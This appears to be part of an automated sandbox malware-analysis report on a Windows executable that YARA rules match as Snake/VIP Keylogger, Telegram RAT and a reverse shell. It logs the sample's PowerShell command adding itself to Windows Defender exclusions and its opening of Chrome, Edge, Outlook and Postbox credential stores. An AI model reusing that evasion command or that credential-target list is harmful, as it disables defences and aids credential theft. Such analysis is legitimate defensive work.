                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe TID: 1908Thread sleep time: -594843s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe TID: 1908Thread sleep time: -594734s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe TID: 1908Thread sleep time: -594625s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeThread delayed: delay time: 599875Jump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeThread delayed: delay time: 599762Jump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeThread delayed: delay time: 599656Jump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeThread delayed: delay time: 599546Jump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeThread delayed: delay time: 599437Jump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeThread delayed: delay time: 599328Jump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeThread delayed: delay time: 599218Jump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeThread delayed: delay time: 599109Jump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeThread delayed: delay time: 599000Jump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeThread delayed: delay time: 598890Jump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeThread delayed: delay time: 598781Jump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeThread delayed: delay time: 598672Jump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeThread delayed: delay time: 598562Jump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeThread delayed: delay time: 598453Jump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeThread delayed: delay time: 598343Jump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeThread delayed: delay time: 598234Jump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeThread delayed: delay time: 598124Jump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeThread delayed: delay time: 598015Jump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeThread delayed: delay time: 597905Jump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeThread delayed: delay time: 597796Jump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeThread delayed: delay time: 597687Jump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeThread delayed: delay time: 597577Jump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeThread delayed: delay time: 597468Jump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeThread delayed: delay time: 597358Jump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeThread delayed: delay time: 597250Jump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeThread delayed: delay time: 597140Jump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeThread delayed: delay time: 597031Jump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeThread delayed: delay time: 596922Jump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeThread delayed: delay time: 596812Jump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeThread delayed: delay time: 596703Jump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeThread delayed: delay time: 596593Jump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeThread delayed: delay time: 596484Jump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeThread delayed: delay time: 596375Jump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeThread delayed: delay time: 596265Jump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeThread delayed: delay time: 596156Jump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeThread delayed: delay time: 596047Jump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeThread delayed: delay time: 595937Jump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeThread delayed: delay time: 595827Jump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeThread delayed: delay time: 595718Jump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeThread delayed: delay time: 595609Jump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeThread delayed: delay time: 595500Jump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeThread delayed: delay time: 595390Jump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeThread delayed: delay time: 595281Jump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeThread delayed: delay time: 595172Jump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeThread delayed: delay time: 595062Jump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeThread delayed: delay time: 594952Jump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeThread delayed: delay time: 594843Jump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeThread delayed: delay time: 594734Jump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeThread delayed: delay time: 594625Jump to behavior
                    Source: 299371485_14108825808_1736351479899.exe, 00000000.00000002.2219355172.0000000003FC1000.00000004.00000800.00020000.00000000.sdmp, 299371485_14108825808_1736351479899.exe, 00000000.00000002.2224357867.0000000009B20000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: rLQeMuOpO6
                    Source: 299371485_14108825808_1736351479899.exe, 00000006.00000002.4617512203.0000000001339000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Adds a directory exclusion to Windows Defender
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe"
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeProcess created: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe "C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe"Jump to behavior
                    Source: 299371485_14108825808_1736351479899.exe, 00000006.00000002.4622133854.0000000003127000.00000004.00000800.00020000.00000000.sdmp, 299371485_14108825808_1736351479899.exe, 00000006.00000002.4622133854.0000000003171000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLR
                    Source: 299371485_14108825808_1736351479899.exe, 00000006.00000002.4622133854.0000000003127000.00000004.00000800.00020000.00000000.sdmp, 299371485_14108825808_1736351479899.exe, 00000006.00000002.4622133854.0000000003171000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeQueries volume information: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeQueries volume information: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Yara detected ReverseShell
                    Source: Yara matchFile source: 0.2.299371485_14108825808_1736351479899.exe.437ec40.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.299371485_14108825808_1736351479899.exe.433c220.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.299371485_14108825808_1736351479899.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.299371485_14108825808_1736351479899.exe.433c220.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.299371485_14108825808_1736351479899.exe.437ec40.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000006.00000002.4617089897.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2219355172.000000000433C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: 299371485_14108825808_1736351479899.exe PID: 4876, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: 299371485_14108825808_1736351479899.exe PID: 6240, type: MEMORYSTR
                    Yara detected Snake Keylogger
                    Source: Yara matchFile source: 00000006.00000002.4622133854.0000000003071000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Yara detected Telegram RAT
                    Source: Yara matchFile source: 0.2.299371485_14108825808_1736351479899.exe.437ec40.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.299371485_14108825808_1736351479899.exe.433c220.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.299371485_14108825808_1736351479899.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.299371485_14108825808_1736351479899.exe.433c220.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.299371485_14108825808_1736351479899.exe.437ec40.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000006.00000002.4617089897.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2219355172.000000000433C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: 299371485_14108825808_1736351479899.exe PID: 4876, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: 299371485_14108825808_1736351479899.exe PID: 6240, type: MEMORYSTR
                    Yara detected VIP Keylogger
                    Source: Yara matchFile source: 0.2.299371485_14108825808_1736351479899.exe.437ec40.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.299371485_14108825808_1736351479899.exe.433c220.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.299371485_14108825808_1736351479899.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.299371485_14108825808_1736351479899.exe.433c220.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.299371485_14108825808_1736351479899.exe.437ec40.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000006.00000002.4617089897.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.4622133854.0000000003127000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2219355172.000000000433C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: 299371485_14108825808_1736351479899.exe PID: 4876, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: 299371485_14108825808_1736351479899.exe PID: 6240, type: MEMORYSTR
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                    Tries to steal Mail credentials (via file / registry access)
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                    Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: Yara matchFile source: 0.2.299371485_14108825808_1736351479899.exe.437ec40.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.299371485_14108825808_1736351479899.exe.433c220.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.299371485_14108825808_1736351479899.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.299371485_14108825808_1736351479899.exe.433c220.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.299371485_14108825808_1736351479899.exe.437ec40.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000006.00000002.4617089897.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2219355172.000000000433C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: 299371485_14108825808_1736351479899.exe PID: 4876, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: 299371485_14108825808_1736351479899.exe PID: 6240, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected ReverseShell
                    Source: Yara matchFile source: 0.2.299371485_14108825808_1736351479899.exe.437ec40.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.299371485_14108825808_1736351479899.exe.433c220.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.299371485_14108825808_1736351479899.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.299371485_14108825808_1736351479899.exe.433c220.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.299371485_14108825808_1736351479899.exe.437ec40.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000006.00000002.4617089897.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2219355172.000000000433C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: 299371485_14108825808_1736351479899.exe PID: 4876, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: 299371485_14108825808_1736351479899.exe PID: 6240, type: MEMORYSTR
                    Yara detected Snake Keylogger
                    Source: Yara matchFile source: 00000006.00000002.4622133854.0000000003071000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Yara detected Telegram RAT
                    Source: Yara matchFile source: 0.2.299371485_14108825808_1736351479899.exe.437ec40.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.299371485_14108825808_1736351479899.exe.433c220.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.299371485_14108825808_1736351479899.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.299371485_14108825808_1736351479899.exe.433c220.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.299371485_14108825808_1736351479899.exe.437ec40.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000006.00000002.4617089897.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2219355172.000000000433C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: 299371485_14108825808_1736351479899.exe PID: 4876, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: 299371485_14108825808_1736351479899.exe PID: 6240, type: MEMORYSTR
                    Yara detected VIP Keylogger
                    Source: Yara matchFile source: 0.2.299371485_14108825808_1736351479899.exe.437ec40.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.299371485_14108825808_1736351479899.exe.433c220.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.299371485_14108825808_1736351479899.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.299371485_14108825808_1736351479899.exe.433c220.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.299371485_14108825808_1736351479899.exe.437ec40.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000006.00000002.4617089897.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.4622133854.0000000003127000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2219355172.000000000433C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
